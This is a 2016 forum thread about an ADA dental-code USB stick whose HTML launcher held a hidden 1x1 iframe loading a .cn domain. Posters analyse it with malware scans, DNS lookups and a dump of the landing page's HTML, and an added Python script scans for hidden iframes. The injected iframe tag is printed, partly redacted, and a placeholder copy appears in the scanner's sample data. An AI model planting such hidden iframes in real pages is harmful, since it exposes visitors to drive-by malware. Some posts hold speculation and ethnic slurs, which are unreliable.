Mike (Mod), 2016-Apr-22 4:09 pm
35 recommendations
ADA just sent me a surprise

Oh wow, the usually inept ADA just sent me new codes. I bet some marketing genius had this wonderful idea instead of making it downloadable. I can't wait to plug an unknown USB into my computer that has PHI/HIPAA on it... Okay, let's plug it into a spare machine. Okay, looks like some HTML launcher. Wonder what the source code looks like?

<!DOCTYPE html>
<html>
<head>
<title>CDT 2016</title>
<link rel="icon" href="Media/images/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="Media/images/favicon.ico" type="image/x-icon" />
<meta http-equiv="Content Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;">
<meta http-equiv="x-rim-auto-match" content="none">
<link rel="stylesheet" media="screen" href="style.css">
<script src="Media/js/jquery-1.10.1.min.js"></script>
<style>
body{font-family:Arial, Helvetica, sansserif;font-weight:normal;margin:0px auto;padding:0px auto;}
option{}
button{
background-color:#FF8000;
color:#ffffff;
font-weight:bold;
font-size:10pt;
text-align:center;
height:28px;
width:74px;
padding: 2px 0px;
cursor:pointer;
}
select{}
label[for="slct1"],label[for="slct2"]{float:left;margin-top;20px;font-size:16pt;font-weight:bold;}
#container{
width:1024px;
height:786px;
margin:0px auto;
}
#left{float:left;height:786px;width:542px;background-color:#FFFFFF;margin:0px auto;}
#mainimg{height:90%;width:100%;background-color:#999;}
#right{float:left;height:786px;width:482px;background-color:#dddddd;margin:0px auto;}
#copy{text-align:left;color:#151515;padding-left:39px;padding-top:15px;font-size:10pt;}
#shadow{height:786px;width:8px;float:left;margin-right:10px;}
#instruction{float:left;margin:0px;font-size:14px;line-height:25px;color:#433d38;}
#toc{float:left;color:#0076be;width:391px;margin-top:58px;margin-bottom:37px;}
#content{float:left;width:391px;margin:125px auto 0px 30px;}
#slct1{float:left;width:391px;margin-bottom:30px;-webkit-box-shadow: inset 1px 1px 1px 1px #999999;box-shadow: inset 1px 1px 1px 1px #999999;}
#slct2{float:left;width:391px;margin-bottom:30px;-webkit-box-shadow: inset 1px 1px 1px 1px #999999;box-shadow: inset 1px 1px 1px 1px #999999;}
#links{height:90%;width:100%;margin-top:180px;font-size:13px;color:#433d38;}
#pipes{color:#0076be;}
.clearfix{clear:both;}
a, a:visited, a:hover, a:link{color:#0076be;text-decoration:none;font-weight:bold;font-size:14px;}
</style>
</head>
<body>
<div id="container">
<div id="left">
<img id="mainimg" src="Media/images/CDT_Cover.jpg" />
<div class="clearfix"></div>
<p id="copy">© 2015 American Dental Association</p>
</div>
<div id="right">
<img src="Media/images/shadow.png" id="shadow" />
<div id="content">
<p id="instruction">Click on the links below to open searchable PDF documents.</p>
<h2 id="toc">Menu</h2>
<!--<select id="slct1" name="slct1">
<option value="Option 00"selected>Please select an option</option>
<option value="documents/Table_of_Contents_and_Preface.pdf">Table of Contents and Preface</option>
<option value="documents/1_Code_on_Dental_Procedures_and_Nomenclature.pdf">Code on Dental Procedures and Nomenclature (CDT Code)</option>
<option value="documents/2_Changes_to_the_CDT_Code.pdf">CDT Code Changes (Summary of additions, revisions, & deletions)</option>
<option value="documents/3_Alphabetical_Index.pdf">Alphabetical Index</option>
<option value="documents/4_Numeric_Index.pdf">Numeric Index</option>
<option value="documents/2012_Dental_Claim_Form.pdf">2012 ADA Dental Claim Form</option>
</select> -->
<!--<div class="clearfix"></div>
<div class="clearfix"></div>-->
<!--<button onclick="location.href=slct1.value;" formtarget="_blank">OPEN</button>-->
<!--<button class="button" onclick="window.open(slct1.value);">Open</button>-->
<table style="width: 400px; line-height:30px;">
<tr><td><a href="documents/Table_of_Contents_and_Preface.pdf" target="_blank">Table of Contents and Preface</a></td></tr>
<tr><td><a href="documents/1_Code_on_Dental_Procedures_and_Nomenclature.pdf" target="_blank">Code on Dental Procedures and Nomenclature (CDT Code)</a></td></tr>
<tr><td><a href="documents/2_Changes_to_the_CDT_Code.pdf" target="_blank">CDT Code Changes (Summary of additions, revisions, & deletions)</a></td></tr>
<tr><td><a href="documents/3_Alphabetical_Index.pdf" target="_blank">Alphabetical Index</a></td></tr>
<tr><td><a href="documents/4_Numeric_Index.pdf" target="_blank">Numeric Index</a></td></tr>
<tr><td><a href="documents/2012_Dental_Claim_Form.pdf" target="_blank">2012 ADA Dental Claim Form</a></td></tr>
</table>
<div class="clearfix"></div>
<div id="links">
For more ADA resources, visit:<br />
<a href="http://www.adacatalog.org" target="_blank">adacatalog.org</a><span id="pipes"> | <a href="http://success.ada.org" target="_blank">Success.ADA.org</a> | </span><a href="http://www.ada.org" target="_blank">ADA.org</a>
</div>
</div>
</div>
</div>
<!-- injected 1x1 hidden iframe loading a remote .cn domain (URL redacted by the poster) -->
<iframe src="http://------NtKrnlpa------.cn---------/rc/" width=1 height=1 style="border:0"></iframe>
</body>
</html>
Wait.

<iframe src="http://------NtKrnlpa------.cn---------/rc/" width=1 height=1 style="border:0"></iframe>

(Please note this is modified code.) Good job. The ADA just sent a malware injector to every ADA dentist in the US. Dumb shits. Edited the URL code because Avast is being bad.
4 recommendations
19579823 (banned, Member), 2016-Apr-22 8:13 pm
What a bunch of morons!!!!

VikingBob (Premium Member)
3 recommendations
to Mike
Nothing suspicious there at all... Oddly, a detection rate of just 10/67: » virustotal.com/en/url/ec ··· 1375227/

Cartel (Premium Member)
to Mike
||ntkrnlpa.cn^ is on the malware domains list... it's a legit badware link. » easylist-downloads.adblo ··· full.txt
Also: » urlquery.net/report.php? ··· 28025779 (attack page)
sivran (Premium Member), 2016-Apr-22 10:35 pm, to Mike

Wow, wait, so this legitimately came from the ADA, or some miscreants pretending to be the ADA?
Mike (Mod), 2016-Apr-22 10:44 pm

This came from the ADA. It's my annual book. This was in the shrink wrap.

Tekie
6 recommendations
to Mike
Doh... haven't watched the Simpsons in a while; when did Homer leave Springfield nuclear power and go to the ADA?
10 recommendations
Snowy (Premium Member), 2016-Apr-23 12:46 am, to Mike

said by Mike: This came from the ADA. It's my annual book. This was in the shrink wrap.

Here's my *guess* of how/why this happened (no rocket science involved). With 156,000 members, the lowest bid for the hardware/writing came from a company located in China. The rest is history. The ADA's press release on the matter will begin with: "The American Dental Association takes the privacy & security of its members very seriously..." I'd suggest they take the word "American" in their name a little more seriously or risk having a name change to "The P'wned American Dental Association".

Bill_MI (MVM)
2 recommendations
to Mike

That 'hidden' iframe technique is rather old. Have you verified that it's not your system(s) generating the embed, just to rule it out? Please contact the responsible parties at the ADA to make them aware of the issue.
5 recommendations
Mike (Mod), 2016-Apr-23 8:05 am

Three books, read-only disk, and different machines.
I'm asking people for more samples.

Bill_MI (MVM)
said by Mike: I'm asking people for more samples.

If I coax my dentist to stick it in, say, my Linux laptop, what am I looking for? I assume a file?
Mike (Mod), 2016-Apr-23 8:59 am

Yeah, look for the html file. There are folders and an autorun in there.
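Mike's answer tells Bill_MI what to look for on the stick: an HTML launcher, some folders and an autorun. The script below is an added example (not code from this thread, from the ADA or from the vendor that mastered the stick) that automates that triage on a mounted volume: it walks the tree, lists any autorun.inf, and parses every .htm/.html file for iframes that are either visually hidden (1x1, display:none, visibility:hidden) or point at a remote http(s) host, which is exactly the shape of the injected tag in Mike's first post. The sample volume it builds under a temp directory is constructed data, and the hostname malicious.example is a placeholder rather than the real domain.

```python
"""Triage a mounted USB volume (or any directory) for the tell-tale signs
described in the thread: an autorun.inf and HTML launcher pages that embed a
hidden or remote <iframe>. Added example; sample data is constructed."""
import os
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlsplit


class IframeFinder(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # unquoted values such as width=1 arrive as the string "1"
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_tiny(value):
    """True for a width/height of 0 or 1 (px), the classic 1x1 injection."""
    v = value.strip().lower().rstrip("px")
    return v.isdigit() and int(v) <= 1


def suspicious_iframes(html_text):
    """Return a list of {src, remote, hidden} for each iframe worth a look.

    A launcher shipped on removable media has no business loading content
    from a remote host, so any absolute http(s) src is flagged; so is any
    frame that is hidden from the user (1x1, display:none, visibility:hidden).
    """
    finder = IframeFinder()
    finder.feed(html_text)
    flagged = []
    for attrs in finder.iframes:
        src = attrs.get("src", "")
        style = attrs.get("style", "").replace(" ", "").lower()
        remote = urlsplit(src).scheme in ("http", "https")
        hidden = (
            (_is_tiny(attrs.get("width", "")) and _is_tiny(attrs.get("height", "")))
            or "display:none" in style
            or "visibility:hidden" in style
        )
        if remote or hidden:
            flagged.append({"src": src, "remote": remote, "hidden": hidden})
    return flagged


def scan_volume(root):
    """Walk root; return {'autorun': [paths], 'pages': {path: [flagged iframes]}}."""
    report = {"autorun": [], "pages": {}}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower() == "autorun.inf":
                report["autorun"].append(path)
            elif name.lower().endswith((".htm", ".html")):
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = suspicious_iframes(fh.read())
                if hits:
                    report["pages"][path] = hits
    return report


def build_sample_volume():
    """Create a throwaway directory that mimics the stick in the thread.

    Constructed sample data: malicious.example is a placeholder host."""
    root = tempfile.mkdtemp(prefix="cdt_stick_")
    with open(os.path.join(root, "autorun.inf"), "w") as fh:
        fh.write("[autorun]\nopen=index.html\n")
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write(
            "<html><body><p>Click on the links below</p>"
            '<iframe src="http://malicious.example/rc/" width=1 height=1 '
            'style="border:0"></iframe></body></html>'
        )
    os.mkdir(os.path.join(root, "documents"))
    with open(os.path.join(root, "documents", "help.html"), "w") as fh:
        # a benign, visible, same-volume frame that must NOT be flagged
        fh.write('<html><body><iframe src="toc.html" width=400 height=300>'
                 "</iframe></body></html>")
    return root


if __name__ == "__main__":
    volume = build_sample_volume()
    result = scan_volume(volume)
    print("autorun files:", result["autorun"])
    for page, hits in result["pages"].items():
        print(page, "->", hits)
```

Run it against the real mount point instead of the constructed volume (`scan_volume("/media/usb")` or the drive letter on Windows). If the same launcher file produces the same flagged iframe from several sticks and several machines, as Mike reports, the embed is on the media and not generated locally.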
to Mike
...I was about to wonder about the iframe tag myself -- IIRC that only worked on IE, but according to Wikipedia, it's now part of HTML5 *shudders*

@VikingBob Thanks for that link... yeah, other than the .cn TLD, with 10/67 recording it as a bad link... one wonders.

DNS resolution of the URL from OpenDNS is as follows:

Non-authoritative answer:
Name:      NtKrnlpa.cn
Addresses: 50.117.120.253
           50.117.116.117

and from Level3:

> server 4.2.2.2
Default Server: b.resolvers.Level3.net
Address: 4.2.2.2
> NtKrnlpa.cn
Server: b.resolvers.Level3.net
Address: 4.2.2.2

Non-authoritative answer:
Name:      NtKrnlpa.cn
Addresses: 50.117.120.253
           50.117.116.117

And according to ARIN that netblock is under its jurisdiction. Registrant info last confirmed 2016-02-01. Abuse POC for that netblock, according to ARIN, which may be another avenue to pursue this:

Point of Contact
Name:              Abuse Department
Handle:            ABUSE1715-ARIN
Company:           Energy Group Networks
Street:            830 Hillview Court Suite 195
City:              Milpitas
State/Province:    CA
Postal Code:       95035
Country:           US
Registration Date: 2007-07-20
Last Updated:      2015-10-26
Comments
Phone:             +1-888-808-8806 (Office)
Email:             abuse@egihosting.com

...anyone with a VM and mad programming skills want to go to that URL and see what it brings up / does?

My humble 00000010 bits

Regards
3 recommendations
to Mike
As an FYI, my Avast flagged this thread as having malware and refused to load it the first time that I tried. On the second attempt it did let me look at it, but subsequent attempts have been erratic. So Avast is being vigilant, but not necessarily as consistent as I might expect.
Avast: Infection blocked
Infection details:
URL: "https://www.dslreports.com/forum/r30717075-ADA-just-sent-me-a-surprise|{gzip}"
Infection: HTML:Iframe-ZS [Trj]
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
2 recommendations
Mike (Mod), 2016-Apr-23 4:05 pm

Probably saw the code.
2 recommendations
scross (Member), 2016-Apr-23 5:30 pm
That's what I'm thinking, too, but its behavior is kind of weird. Right after I posted the above message, Avast simply refused to let me access this thread again - just flat-out blocked it, with no warning, no nothing. But now, after some time has passed, I can see it again and Avast is again throwing the warning. I wonder if this is a time-out thing, or if maybe Avast sees that the page has changed because you posted a new message.
In any case, situations like this (the ADA sending out malware, if that's what really happened) are just unconscionable in this day and age. It reminds me of a situation I faced a couple of years ago, where I was trying to access a law enforcement security-related website, only it was loaded with malware and Avast kept going nuts. They couldn't seem to get it cleaned up, either (or at least keep it cleaned up), and so eventually took it down for an extended period of time. I don't know if they ever brought it back up again.

DarkLogix (Premium Member)
2 recommendations
Maybe the ADA and FBI or NSA or CIA are trying to get more Trojans out to get more data.
I'd try contacting them or e-mailing an Ars Technica writer.

Blackbird (Premium Member)
2 recommendations
to Mike
Or... perhaps the simplest explanation is the most likely: a hacker cartel figured that infecting dental-office computers en masse might just be an easy way to get at a host of patient records (and perhaps credit card data), or perhaps they intend to suddenly hit the dental systems with ransomware. All it would take was somebody on the "inside" to insert the malware code into the ADA stick code at the factory or anywhere earlier in the custody chain, which - with the typical lack of in-depth QA in certain notable parts of the Orient - would just about guarantee a large 'placement' of malware. Who's going to notice? Certainly not the ADA, nor probably the outfit they hired to put the procedure codes into digital form. The sad truth is that on something like this, nobody is paying attention. Until now.

norwegian (Premium Member)
1 recommendation
to Mike
For the record: » www.stopbadware.org/fire ··· %2Frc%2F

The page links to: hxxp://pd.dopa.com.cn/?dm=ntkrnlpa.cn&acc=936A22A3-A90C-487E-B7D0-E589A70BB515&poprequest=1

I had a few blocks in place and didn't just allow, so it might not be fully correct. Jsunpack used to be a good source for checking links like this, but I've found them offline these days.

<!DOCTYPE html><!--[if lt IE 7]><html class="ie6"><![endif]--><!--[if IE 7]><html class="ie7"><![endif]--><!--[if IE 8]><html class="ie8"><![endif]--><!--[if IE 9]><html class="ie9"><![endif]--><!--[if(gt IE 9)|!(IE)]><!--><html class=""><!--<![endif]--><head><meta http-equiv="Content-Type"content="text/html; charset=utf-8"><title>ntkrnlpa.cn</title><style>*{margin:0;padding:0;border:0}body{font-size:14px;font-family:"SimSun","宋体","Arial Narrow";background-color:#f0f0f0}.left{float:left}.right{float:right}.mt12{margin-top:12px}a{text-decoration:none;cursor:pointer}.bgbox{width:958px;border:1px solid#333;background-color:#202020}.top_bg{min-width:1210px;height:40px;background-color:#3388FF;color:white;margin-bottom:10px}.top_bg h1{font-family:"Microsoft YaHei";font-size:22px;font-weight:normal;line-height:40px;float:left;width:250px}.container{width:1210px;margin:0 auto;height:40px}.content{background-color:#202020}.content.left_con{width:215px}.right_con{border-left:2px solid#303030;padding-left:20px}.ie6 .right_con,.ie7 .right_con{padding-left:20px}.clearfix:after{clear:both;content:".";display:block;font-size:0;height:0;line-height:0;visibility:hidden}.Dline{width:960px;height:1px;border-top:2px solid#303030}.search_bar{height:90px;width:733px;margin:0 auto}img{vertical-align:middle}input{outline:medium none}.s{display:inline-block;vertical-align:top}.s_inp_wr{background:#fff;border-color:#9A9A9A#CDCDCD#CDCDCD#9A9A9A;border-image:none;border-style:solid;border-width:1px;height:34px}.s_btn_wr{height:36px;width:100px;z-index:0;background:#3385ff}.s_ipt{font:16px/22px arial;height:22px;text-align:left;margin:7px 0 0 
7px;width:512px}.s_btn{cursor:pointer;font:15px/36px arial;letter-spacing:1px;background:#3385ff;border-bottom:1px solid#2d78f4;color:#fff;height:36px;width:100px}.hot_search{height:35px;margin-left:96px;font-size:14px;color:#939393}.hot_search li{float:left;padding:12px 10px;display:inline}.hot_search li a{color:#939393}.hot_search li a:hover{text-decoration:underline;color:#c00}.bt_addlink{height:180px;padding-top:10px}.bt_addlink a{float:left;padding:0 58px 0 6px;width:98px;color:#0098c8;font:normal 15px/34px"宋体";display:block;height:34px;overflow:hidden}.bt_addlink a.last{padding-right:0px}.bt_addlink a:hover{text-decoration:underline;color:#f00}.bottom_add{padding:20px 20px 12px}#footer{position:relative;margin-top:20px;color:#999;text-align:center;font-size:14px;line-height:20px;font-family:"\5fae\8f6f\96c5\9ed1",'Microsoft Yahei'}#footer.footer-cont{background:#2a2931;position:relative;min-width:1210px}#footer.footer-detail{margin:0 auto;padding:13px 0;padding-top:20px;width:1000px;color:#999}#footer.footer-detail a{padding:0 10px;color:#999}#footer.footer-detail a:hover{text-decoration:underline}#footer.footer-l{position:absolute;left:20px;top:20px}#footer.footer-r{position:absolute;right:20px;top:20px}#body{background:#f0f0f0;width:1230px}.xinnet{float:left;line-height:40px;font-size:16px;color:#fff}</style></head><script type="text/javascript">var unique=(function(){var time=(new Date()).getTime()+'_',i=0;return function(){return time+(i++)}})();var gl={trackingurl:'http://pd.dopa.com.cn/tracking.php',searchurl:'/'};var err={errorcode:0,errormsg:''};var google_afd_request={};var secondtier_request={dm:'ntkrnlpa.cn',sk:'',partner:'121',format:'json',sac:'',oc:false};var 
req={dm:'ntkrnlpa.cn',acc:'936A22A3-A90C-487E-B7D0-E589A70BB515',landerid:480,cate:0,buy:true,adultallowed:true,cusbuy:'',contactinfo:'',partner:'secondtier',ac:12,kc:10,sk:'',is:false,lp:true,oc:true,q:'A4YpTvlwHnbPPheoYaqhiM7_vs01t2fO8bdsX5hIDA6192jWgkUW3OL-qGc6NE-8QqQDa_ZYuZR3p35m4YlCHeYJqFF8ZRbHRF1c3MV6FbljlI7JYB2kjDYOGnwRXC3x9UZT_3cMh0HrTfn9T1Oz_qLv_PoN0dLJLfYq6_rBQ8alwkTFrszNeEH29A-9mnbFqXjk6WPov95pLCE37XiO8-GMfaJz6WX66c9z6SWI7J9UbDBXO9v00OgI n71kpxXyiiGMUdCtX4UejMWvx985kJW9UL23Qodywk-XZrLv8CsI-2F8kRxe9HN2ZuJObLEnndoETd3-d9 PYDO_S4WJVV2EoVmH-G7pdIz7Wi-DGTWpz6oQVfYpvZe8OPqydMuXjc1Coq213VhjK2iM_9oCBhmgJQvhU5ASTjt30KLMG4lAnkx_iesvqipuUNBWrFC_EKFgjuoevoMPdtR0YXq5L5p8KVcJtsk93FFW_vyoKn61_GI1IemDkDCC2e5FNPRfUc-FoSMBKfe1ZluYr_bEwsGAH9XmtJHPFSeNfrNgQd68zQZV2viTle6jT0S9ZvMMAZEy8oucULyaGPtSW3blIlaaXgri53f8nxVd tL7yxC851kN1n8HTzug1AHujy9CesV3wObrTi1AUu04uQaxlPXDnbUAjyQtukkr0SQmCoOF84-lkJfmcMJ WfHV8Cx65gZmWipJmUgGzv7BBuIujTohn9-Vwt2SZUtwT-yX_TfNbqMOkM-8_tp7mM2fNYDkuHf',framerequest:true,hk:'',sc:0,apk:''};var resp={response_snapped:false,isfaillisted:false,isadult:false,needsreview:false,isblocked:false,q:'',search_token:'',token:'',feedback_url:'',ac:0,kc:0,ads:[],rks:[],cates:[],tz:new Date().getTimezoneOffset(),ck:'',px:0,py:0,mm:false};resp.rks=[];</script><script src="http://a1.dnbizcdn.com/js/b/caf.js"type="text/javascript"></script><script type="text/javascript">denyFrame();try{}catch(e){setErrorTracking(e)}function init(){setRequestTracking()}window.onload=init;</script><body><div class="top_bg"><div class="container"><div class="left"id="unit_dm"><h1>ntkrnlpa.cn</h1><div class="clearfix"></div></div><div id="div_custom"class="right"style="width:600px;line-height:20px;text-align: right; padding-top:10px;"><script type="text/javascript">try{if(req.buy){if(req.cusbuy.length>0){document.write(req.cusbuy)}else if(req.contactinfo.length>0){document.write(req.contactinfo)}}}catch(e){}</script></div></div></div><link 
rel="stylesheet"href="http://a1.dnbizcdn.com/rd.121.com/css/global.css"/><link rel="stylesheet"href="http://a1.dnbizcdn.com/rd.121.com/css/index-m1.css"/><div class="layout"><div style="border:1px solid #ddd;"><div><!--u2578532#pd.dopa.com.cn#首页-1p顶部图片广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578532";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"1198",rsi1:"200",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"180",pih:"160",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div><!--u2578705#pd.dopa.com.cn#首页-1p顶部图片广告1创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578705";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"1198",rsi1:"200",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"180",pih:"160",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div><a href="http://traffic.cn/cn/ticket.html#nav"target="_blank"><img src="http://a1.dnbizcdn.com/rd.121.com/images/traffic1200x100.jpg"width="1198"/></a></div><div><div class="fl"><!--u2578710#pd.dopa.com.cn#首页-1p顶部图片广告2创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578710";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"599",rsi1:"200",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"180",pih:"160",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"><!--u2578733#pd.dopa.com.cn#首页-1p顶部图片广告3创建于2016-03-28--><script type="text/javascript">var 
cpro_id="u2578733";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"599",rsi1:"200",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"180",pih:"160",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="clearfix"></div></div></div></div><!--每日推荐start--><div class="layout"><div id="meiritj"class="mt10"><div class="imgtt"><!--u2578721#pd.dopa.com.cn#首页-2p纯文本广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578721";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"1198",rsi1:"32",pat:"3",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",tft:"0",tlt:"1"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="imgcons"><div class="fl"style="width:300px;"><div class="l-img"><!--u2578743#pd.dopa.com.cn#首页-2p左大图广告300*250创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578743";</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div style="padding-top:10px;background:#fff;"><!--u2578749#pd.dopa.com.cn#首页-2p左大图下纯文本广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578749";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"300",rsi1:"150",pat:"3",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",tft:"0",tlt:"1"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div></div><div class="r-list fr"><!--u2578754#pd.dopa.com.cn#首页-2p右图片广告创建于2016-03-28--><script type="text/javascript">var 
cpro_id="u2578754";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"860",rsi1:"210",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"200",pih:"180",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script><!--u2578761#pd.dopa.com.cn#首页-2p右图片广告1创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578761";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"860",rsi1:"210",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"200",pih:"180",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="clear"></div></div><div class="clear"></div></div></div><!--每日推荐end--><div class="layout"><div class="mt20"style="border:1px solid #ddd;"><div class="fl"><!--u2578769#pd.dopa.com.cn#首页-2p下方图片广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578769";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"340",rsi1:"180",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"160",pih:"140",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"><!--u2578772#pd.dopa.com.cn#首页-2p下方图片广告1创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578772";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"518",rsi1:"180",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"160",pih:"140",ptp:"0"}</script><script 
src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="fl"><!--u2578775#pd.dopa.com.cn#首页-2p下方图片广告2创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578775";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"340",rsi1:"180",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"160",pih:"140",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="clearfix"></div></div></div><!--社会动态start--><div class="layout"><div id="shehuidt"class="mt20"><div class="imgtt"><!--u2578777#pd.dopa.com.cn#首页-3p纯文本广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578777";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"1198",rsi1:"32",pat:"3",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",tft:"0",tlt:"1"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div class="imglist"><div style="margin-left:-13px;"><!--u2578817#pd.dopa.com.cn#首页-3p纯文本下方图片广告创建于2016-03-28--><script type="text/javascript">var cpro_id="u2578817";(window["cproStyleApi"]=window["cproStyleApi"]||{})[cpro_id]={at:"3",rsi0:"1190",rsi1:"180",pat:"6",tn:"baiduCustNativeAD",rss1:"#FFFFFF",conBW:"0",adp:"1",ptt:"0",titFF:"%E5%BE%AE%E8%BD%AF%E9%9B%85%E9%BB%91",titFS:"14",rss2:"#000000",titSU:"0",ptbg:"90",piw:"220",pih:"155",ptp:"0"}</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js"type="text/javascript"></script></div><div style="margin-left:-13px;"><div class="fl"><!--u2578824#pd.dopa.com.cn#首页-3p纯文本下左边两图广告创建于2016-03-28--><script type="text/javascript">var 
